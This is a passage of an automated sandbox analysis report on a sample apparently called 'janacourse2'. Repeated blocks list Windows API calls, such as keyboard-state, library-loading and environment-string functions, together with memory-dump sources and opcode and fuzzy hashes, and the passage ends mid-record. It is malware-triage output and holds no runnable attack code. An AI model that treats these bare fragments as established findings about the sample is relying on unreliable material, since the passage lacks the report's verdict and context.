                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                            • String ID:
                                                                                                            • API String ID: 2832842796-0
                                                                                                            • Opcode ID: dd0a3db36eec0fb25cc45f0c896702fb10f1abc545a11e90a644e63ae99121db
                                                                                                            • Instruction ID: 2e3660945fa76a481438edf7ffe869f6c9c1a40f017e24800eaab7697e8f92e2
                                                                                                            • Opcode Fuzzy Hash: dd0a3db36eec0fb25cc45f0c896702fb10f1abc545a11e90a644e63ae99121db
                                                                                                            • Instruction Fuzzy Hash: EF514B79A002199FDB11DF65C981AA9BBF5FF48314F088099E849AB362CB35ED41DF90
                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 01038F40
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 01038FD0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 01038FEC
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 01039032
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 01039052
                                                                                                              • Part of subcall function 00FCF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,01021043,?,753CE610), ref: 00FCF6E6
                                                                                                              • Part of subcall function 00FCF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0100FA64,00000000,00000000,?,?,01021043,?,753CE610,?,0100FA64), ref: 00FCF70D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 666041331-0
                                                                                                            • Opcode ID: 6d19b787f82324122c33fbf11d36e4c8e6105112daa4689b62c93a436dc2bdd7
                                                                                                            • Instruction ID: 3c772d0a1450ff8e27f9cbab838c6af8f36ab722ea68fd761b5871131c0a685a
                                                                                                            • Opcode Fuzzy Hash: 6d19b787f82324122c33fbf11d36e4c8e6105112daa4689b62c93a436dc2bdd7
                                                                                                            • Instruction Fuzzy Hash: A45136386052059FCB11DF68C4848ADBBF5FF89314B0881A9F94A9B362D775ED85CF90
                                                                                                            APIs
                                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 01046C33
                                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 01046C4A
                                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 01046C73
                                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0102AB79,00000000,00000000), ref: 01046C98
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 01046CC7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3688381893-0
                                                                                                            • Opcode ID: fcb8ae65498d679613af6b2a9010fef793a5897c1f23b4c2f16ef4e9f6fb9453
                                                                                                            • Instruction ID: cca5d27055173f08f7d4d5eacbb1b41431408c04abd391dc579bf53c94a2ccb6
                                                                                                            • Opcode Fuzzy Hash: fcb8ae65498d679613af6b2a9010fef793a5897c1f23b4c2f16ef4e9f6fb9453
                                                                                                            • Instruction Fuzzy Hash: 6B41A3B5A04108AFE724CE68C9D4BB97FA5EB0A350F0402B4E995A7291E372AD41CA84
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 283de9b11c5b2c695ca1fa9cd06f0e88684e7f8d93bcfd33a1c8331056415b46
                                                                                                            • Instruction ID: 1053e40fd09e2468c5e9aa521a116324e353b1e2989350a0398d8b6914507e52
                                                                                                            • Opcode Fuzzy Hash: 283de9b11c5b2c695ca1fa9cd06f0e88684e7f8d93bcfd33a1c8331056415b46
                                                                                                            • Instruction Fuzzy Hash: EB410632E002049FDB24DF79C981A5DB3F9EF89320F154569E615EB392E735AE01EB80
                                                                                                            APIs
                                                                                                            • GetCursorPos.USER32(?), ref: 00FC9141
                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00FC915E
                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00FC9183
                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00FC919D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4210589936-0
                                                                                                            • Opcode ID: 06fe3ddcdc5a26927dfbdab399915ef4b83bd238b9764d401b617be8afb2891a
                                                                                                            • Instruction ID: c467531c8030bf65e00d505edbdaacbdaf608fd1a81f431669eeebf0efe6b137
                                                                                                            • Opcode Fuzzy Hash: 06fe3ddcdc5a26927dfbdab399915ef4b83bd238b9764d401b617be8afb2891a
                                                                                                            • Instruction Fuzzy Hash: 9141F571A0810BFBEF169F68C949BEEB7B1FF05320F104229E4A5A32D0C7746950CB91
                                                                                                            APIs
                                                                                                            • GetInputState.USER32 ref: 010238CB
                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 01023922
                                                                                                            • TranslateMessage.USER32(?), ref: 0102394B
                                                                                                            • DispatchMessageW.USER32(?), ref: 01023955
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01023966
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                            • String ID:
                                                                                                            • API String ID: 2256411358-0
                                                                                                            • Opcode ID: 0c2f25f26221b5239f9794758379a2098dc311e1259af87f9b6bc2b6d2872810
                                                                                                            • Instruction ID: da1d66438be5ddba7e7a2e8b369c84ed6db954418d13105c78219a240c023d45
                                                                                                            • Opcode Fuzzy Hash: 0c2f25f26221b5239f9794758379a2098dc311e1259af87f9b6bc2b6d2872810
                                                                                                            • Instruction Fuzzy Hash: AD31A870608352EFFB75CB389549BBA3BE8BB0E304F044599D5D28A185D77E9085CB11
                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32(?,?), ref: 01011915
                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 010119C1
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 010119C9
                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 010119DA
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 010119E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3382505437-0
                                                                                                            • Opcode ID: 478831280b7458bbc6627850c36e28e15751e21e3a78a796f04f2b85170ff7b3
                                                                                                            • Instruction ID: 40943751dba4e39aaa225a6e5c11af7b2ad9f48870a8284692758228738f6e81
                                                                                                            • Opcode Fuzzy Hash: 478831280b7458bbc6627850c36e28e15751e21e3a78a796f04f2b85170ff7b3
                                                                                                            • Instruction Fuzzy Hash: FE31D6B5900219EFDB14CFBCDA88ADE3BB6EB05315F004265FAB1A72D5C7749944CB90
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01045745
                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0104579D
                                                                                                            • _wcslen.LIBCMT ref: 010457AF
                                                                                                            • _wcslen.LIBCMT ref: 010457BA
                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 01045816
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 763830540-0
                                                                                                            • Opcode ID: cc7a12f8519fabe231e4e44bcd87be1c5228636f7ba6a8de1b72ead5f1e7cec6
                                                                                                            • Instruction ID: 9e88f39083118262effc66851a01033b31d14a5d9b25e0983c1e28303b0324fc
                                                                                                            • Opcode Fuzzy Hash: cc7a12f8519fabe231e4e44bcd87be1c5228636f7ba6a8de1b72ead5f1e7cec6
                                                                                                            • Instruction Fuzzy Hash: 2321A5F59042189BEB20DF64DCC5AEE7BB8FF45324F008276EA99EA180D7749585CF50
                                                                                                            APIs
                                                                                                            • IsWindow.USER32(00000000), ref: 01030951
                                                                                                            • GetForegroundWindow.USER32 ref: 01030968
                                                                                                            • GetDC.USER32(00000000), ref: 010309A4
                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 010309B0
                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 010309E8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 4156661090-0
                                                                                                            • Opcode ID: e6289f3c9f01a7ab1b5f4e25fd633c43bd2b67cf915ba4aaafd7d571879c9e8f
                                                                                                            • Instruction ID: 9cb82b626d749192ca0b4854dc130e9716d407a08e040323c79e25b0c07f7cfd
                                                                                                            • Opcode Fuzzy Hash: e6289f3c9f01a7ab1b5f4e25fd633c43bd2b67cf915ba4aaafd7d571879c9e8f
                                                                                                            • Instruction Fuzzy Hash: 2321A179600214AFE714EF65C984AAEBBF9FF48710F048069F88A97355CB75AD04CB50
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00FECDC6
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FECDE9
                                                                                                              • Part of subcall function 00FE3820: RtlAllocateHeap.NTDLL(00000000,?,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6,?,00FB1129), ref: 00FE3852
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FECE0F
                                                                                                            • _free.LIBCMT ref: 00FECE22
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FECE31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 336800556-0
                                                                                                            • Opcode ID: 308f23fdc4906bae297b1ccb799b694296f3a4b2d747c9fdef5a7fe1fe952514
                                                                                                            • Instruction ID: 21de6e8f16a5abd808928883055a3ead8dec81bc37c6a25ac1378e7e44e924f2
                                                                                                            • Opcode Fuzzy Hash: 308f23fdc4906bae297b1ccb799b694296f3a4b2d747c9fdef5a7fe1fe952514
                                                                                                            • Instruction Fuzzy Hash: 4601D4B3A022957F333116BB6D8CD7F796DDEC6FA13150129F905D7200EA668E02A2F0
                                                                                                            APIs
                                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC9693
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00FC96A2
                                                                                                            • BeginPath.GDI32(?), ref: 00FC96B9
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00FC96E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                                            • String ID:
                                                                                                            • API String ID: 3225163088-0
                                                                                                            • Opcode ID: 06705fd9a312e242498687109d6864996a3b02750efe167ce9909fbc740f04d9
                                                                                                            • Instruction ID: ab1cb4fcb52671d1f6ab78aeed4d9631981cc546092d1df45ade9bc254bc9276
                                                                                                            • Opcode Fuzzy Hash: 06705fd9a312e242498687109d6864996a3b02750efe167ce9909fbc740f04d9
                                                                                                            • Instruction Fuzzy Hash: 4C21C87181A306EFEB218F54DA49BAD3BA4BF11325F104259F4D0A21D4D3BA5842EF90
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 2931989736-0
                                                                                                            • Opcode ID: 31e1d3f47b920e14478b1b1280091b21bde65470cf494c26e0368a933880c243
                                                                                                            • Instruction ID: 448d6f49243765a30458e43e1ace726a7ca37bf6aabd352da39dae62248e572d
                                                                                                            • Opcode Fuzzy Hash: 31e1d3f47b920e14478b1b1280091b21bde65470cf494c26e0368a933880c243
                                                                                                            • Instruction Fuzzy Hash: BD01B5E564120ABBE2485519AE83FBB739DBB923A4F044025FD849E206F768ED1096E4
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,?,00FDF2DE,00FE3863,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6), ref: 00FE2DFD
                                                                                                            • _free.LIBCMT ref: 00FE2E32
                                                                                                            • _free.LIBCMT ref: 00FE2E59
                                                                                                            • SetLastError.KERNEL32(00000000,00FB1129), ref: 00FE2E66
                                                                                                            • SetLastError.KERNEL32(00000000,00FB1129), ref: 00FE2E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3170660625-0
                                                                                                            • Opcode ID: 6ff1ea1851743f2391edf07d6d4ad92cb354f4ca777403de0faf81d91c6645c4
                                                                                                            • Instruction ID: c5791446151eb6b777cc0111172de7e30ebff2364528751ed2b2b2d77e2c9436
                                                                                                            • Opcode Fuzzy Hash: 6ff1ea1851743f2391edf07d6d4ad92cb354f4ca777403de0faf81d91c6645c4
                                                                                                            • Instruction Fuzzy Hash: 49017D779066D027D76226376D8AD2F376DABC1371B354028F490A3186FF3D8C007120
                                                                                                            APIs
                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?,?,0101035E), ref: 0101002B
                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?), ref: 01010046
                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?), ref: 01010054
                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?), ref: 01010064
                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?), ref: 01010070
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 3897988419-0
                                                                                                            • Opcode ID: ab98307055b3c1e37b0cc5fb9aef048be43f49bb54f51ced3ce4e3f3798b5dc8
                                                                                                            • Instruction ID: dece58df05c3487851917972a6b0bd671fc611965d8f58cab49534219908aa04
                                                                                                            • Opcode Fuzzy Hash: ab98307055b3c1e37b0cc5fb9aef048be43f49bb54f51ced3ce4e3f3798b5dc8
                                                                                                            • Instruction Fuzzy Hash: F50184B6601205BFFB214F68DD44BAA7EEDEB44661F144118F9C5D2208E77ADA808760
                                                                                                            APIs
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0101E997
                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0101E9A5
                                                                                                            • Sleep.KERNEL32(00000000), ref: 0101E9AD
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0101E9B7
                                                                                                            • Sleep.KERNEL32 ref: 0101E9F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                            • String ID:
                                                                                                            • API String ID: 2833360925-0
                                                                                                            • Opcode ID: afca01d70249ca72f991e66c4cf54544a69984cbe60a5311f55888fd93b232f7
                                                                                                            • Instruction ID: 2a9f290ffaf862957a4b7d1b86dc26d1b5361b57c2383d1adefc37ac19497064
